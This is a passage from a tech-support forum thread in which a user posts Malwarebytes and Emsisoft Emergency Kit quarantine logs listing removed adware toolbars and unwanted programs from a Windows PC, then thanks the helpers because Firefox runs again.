PUP.Optional.ConduitTB.Gen, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\y02lqlpx.default\CT2438727\Dialogs\SearchProtectorDialog, Quarantined, [fc091fa7eeacb77f6df9c90a4cb555ab], 
PUP.Optional.ConduitTB.Gen, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\y02lqlpx.default\CT2438727\Dialogs\ToolbarFirstTimeDialog, Quarantined, [fc091fa7eeacb77f6df9c90a4cb555ab], 
PUP.Optional.ConduitTB.Gen, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\y02lqlpx.default\CT2438727\Dialogs\ToolbarFirstTimeDialog\images, Quarantined, [fc091fa7eeacb77f6df9c90a4cb555ab], 
PUP.Optional.ConduitTB.Gen, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\y02lqlpx.default\CT2438727\Dialogs\ToolbarUntrustedAppsApprovalDialog, Quarantined, [fc091fa7eeacb77f6df9c90a4cb555ab], 
PUP.Optional.ConduitTB.Gen, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\y02lqlpx.default\CT2438727\Dialogs\UntrustedAddedAppDialog, Quarantined, [fc091fa7eeacb77f6df9c90a4cb555ab], 
PUP.Optional.ConduitTB.Gen, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\y02lqlpx.default\CT2438727\Dialogs\UntrustedAppApprovalDialog, Quarantined, [fc091fa7eeacb77f6df9c90a4cb555ab], 
PUP.Optional.ConduitTB.Gen, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\y02lqlpx.default\CT2438727\Dialogs\UntrustedAppPendingDialog, Quarantined, [fc091fa7eeacb77f6df9c90a4cb555ab], 
PUP.Optional.ConduitTB.Gen, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\y02lqlpx.default\conduit, Quarantined, [ef167551f3a787afbf8522b3d22fd22e], 
PUP.Optional.ConduitTB.Gen, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\y02lqlpx.default\conduit\alert, Quarantined, [ef167551f3a787afbf8522b3d22fd22e], 
PUP.Optional.ConduitTB.Gen, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\y02lqlpx.default\conduit\alert\Dialogs, Quarantined, [ef167551f3a787afbf8522b3d22fd22e], 
PUP.Optional.ConduitTB.Gen, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\y02lqlpx.default\conduit\alert\Dialogs\AppNotificationDialog, Quarantined, [ef167551f3a787afbf8522b3d22fd22e], 
PUP.Optional.ConduitTB.Gen, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\y02lqlpx.default\conduit\alert\Dialogs\AppNotificationDialog\Images, Quarantined, [ef167551f3a787afbf8522b3d22fd22e], 
PUP.Optional.ConduitTB.Gen, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\y02lqlpx.default\conduit\cachedIcons, Quarantined, [ef167551f3a787afbf8522b3d22fd22e], 
PUP.Optional.PullUpdate, C:\ProgramData\BNsBemf\dat, Quarantined, [20e53c8ad4c6d16519b17ac11ae9da26], 
PUP.Optional.PullUpdate, C:\ProgramData\BNsBemf, Quarantined, [20e53c8ad4c6d16519b17ac11ae9da26], 
 
Files: 26
PUP.Optional.SpyHunter, C:\Users\Kenneth\Documents\SpyHunter-Installer.exe, Quarantined, [18edae18b0ead16528d87c60bc478878], 
PUP.Optional.PicBadges, C:\Users\Kenneth\Downloads\PicBadges_Setup(1).exe, Quarantined, [4eb7a91d54466ccaad9645d3f50bb947], 
PUP.Optional.PicBadges, C:\Users\Kenneth\Downloads\PicBadges_Setup.exe, Quarantined, [d92cc204e6b4fb3bd86b1206dc24bd43], 
PUP.Optional.ClientConnect, C:\Users\Kenneth\Downloads\tb_MyPoints(1).exe, Quarantined, [e520ecda207a3afc3957038ce31de917], 
PUP.Optional.ClientConnect, C:\Users\Kenneth\Downloads\tb_MyPoints(2).exe, Quarantined, [9075bc0abbdfbf772070d9b61ce4e51b], 
PUP.Optional.ClientConnect, C:\Users\Kenneth\Downloads\tb_MyPoints(3).exe, Quarantined, [42c3d0f628722b0b7b15c0cfa9573fc1], 
PUP.Optional.ClientConnect, C:\Users\Kenneth\Downloads\tb_MyPoints(4).exe, Quarantined, [bb4a9b2bbedc6fc76a267817768aee12], 
PUP.Optional.ClientConnect, C:\Users\Kenneth\Downloads\tb_MyPoints(5).exe, Quarantined, [93723096a1f9e551c1cfa1eee7190bf5], 
PUP.Optional.ClientConnect, C:\Users\Kenneth\Downloads\tb_MyPoints.exe, Quarantined, [d92c6066485271c591ff840b6a96669a], 
PUP.Optional.FreeCauseTB, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\y02lqlpx.default\FCTB\{18b8f08d-62fe-4dfc-ad6c-9ce46515d5ec}\58757\58bd23832ec0fb84ee453f362bb02392, Quarantined, [8481dbebd0ca93a3adc9ad15946d11ef], 
PUP.Optional.FreeCauseTB, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\y02lqlpx.default\FCTB\{51ef49d2-624b-4194-8b97-1c468e9b0efe}\60497\26082a533fcc92d401bc2561cd0ec0ed.0, Quarantined, [6d983393257500360175477b6d94956b], 
PUP.Optional.ConduitTB.Gen, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\y02lqlpx.default\CT2438727\UserAdditionalComponents.xml, Quarantined, [fc091fa7eeacb77f6df9c90a4cb555ab], 
PUP.Optional.ConduitTB.Gen, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\y02lqlpx.default\conduit\alert\Dialogs\PIE.htc, Quarantined, [ef167551f3a787afbf8522b3d22fd22e], 
PUP.Optional.ConduitTB.Gen, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\y02lqlpx.default\conduit\alert\Dialogs\settings.js, Quarantined, [ef167551f3a787afbf8522b3d22fd22e], 
PUP.Optional.ConduitTB.Gen, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\y02lqlpx.default\conduit\cachedIcons\http___storage_conduit_com_27_243_CT2438727_Images_Blank.png, Quarantined, [ef167551f3a787afbf8522b3d22fd22e], 
PUP.Optional.ConduitTB.Gen, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\y02lqlpx.default\conduit\cachedIcons\http___storage_conduit_com_7_176_CT1764407_Images_634219899986281250.gif, Quarantined, [ef167551f3a787afbf8522b3d22fd22e], 
PUP.Optional.ConduitTB.Gen, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\y02lqlpx.default\conduit\cachedIcons\http___storage_conduit_com_images_skins_zynga_seperator.gif, Quarantined, [ef167551f3a787afbf8522b3d22fd22e], 
PUP.Optional.FreeCauseBHO, C:\Program Files (x86)\Mob Wars Toolbar\Toolbar.dll, Quarantined, [c83d388e5644aa8c3bbc4cdbdf24ff01], 
PUP.Optional.FreeCauseBHO, C:\Users\Kenneth\AppData\LocalLow\FCTB000058757\Toolbar\Toolbar.dll, Quarantined, [c83d388e5644aa8c3bbc4cdbdf24ff01], 
PUP.Optional.FreeCauseBHO, C:\Program Files (x86)\MyPoints Toolbar\Toolbar.dll, Quarantined, [739202c4267477bf8b6c6abd5ea59d63], 
PUP.Optional.FreeCauseBHO, C:\Users\Kenneth\AppData\LocalLow\FCTB000101075\Toolbar\Toolbar.dll, Quarantined, [739202c4267477bf8b6c6abd5ea59d63], 
PUP.Optional.PullUpdate, C:\ProgramData\BNsBemf\dat\tGCoZzZ.exe.config, Quarantined, [20e53c8ad4c6d16519b17ac11ae9da26], 
PUP.Optional.PullUpdate, C:\ProgramData\BNsBemf\dat\uLrOJTTvw.exe.config, Quarantined, [20e53c8ad4c6d16519b17ac11ae9da26], 
PUP.Optional.PullUpdate, C:\ProgramData\BNsBemf\info.dat, Quarantined, [20e53c8ad4c6d16519b17ac11ae9da26], 
PUP.Optional.PullUpdate, C:\ProgramData\BNsBemf\kiXODTd.dat, Quarantined, [20e53c8ad4c6d16519b17ac11ae9da26], 
PUP.Optional.PullUpdate, C:\ProgramData\BNsBemf\kiXODTd.exe.config, Quarantined, [20e53c8ad4c6d16519b17ac11ae9da26], 
 
Physical Sectors: 0
(No malicious items detected)
 
 
(end)
 
Emsisoft Emergency Kit - Version 11.9
Quarantine log
 
Date Source Event Detection
11/28/2016 10:28:41 PM Key: HKEY_USERS\S-1-5-21-1169555862-3845460206-1416485692-1004\SOFTWARE\APPDATALOW\SOFTWARE\CONDUIT Moved to quarantine Application.Toolbar (A)
11/28/2016 10:28:41 PM Key: HKEY_USERS\S-1-5-21-1169555862-3845460206-1416485692-1000\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{AFBCB7E0-F91A-4951-9F31-58FEE57A25C4} Moved to quarantine Application.Win32.WSearch (A)
 

and foxfire is back to running.    i thank you very much.


Edited by kenbarber, 28 November 2016 - 10:41 PM.

  • 0






Similar Topics

0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users

As Featured On:

Microsoft Yahoo BBC MSN PC Magazine Washington Post HP